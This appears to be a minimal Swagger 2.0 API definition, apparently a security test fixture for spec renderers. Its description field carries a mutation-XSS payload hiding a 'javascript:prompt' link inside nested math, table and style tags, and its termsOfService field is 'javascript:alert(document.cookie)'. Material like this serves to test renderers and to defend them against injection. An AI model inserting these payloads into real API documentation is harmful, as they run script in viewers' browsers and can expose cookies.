swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: <math><foo-test><mi><li><table><foo-test><li></li></foo-test><a><style><! \${</style>}<foo-b id="><a href='javascript:prompt`1`>'><img src='x' =''>">hmm...</foo-b></a></table></li></mi></foo-test></math>
  version: production
  termsOfService: 'javascript:alert(document.cookie)'
basePath: /Test/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
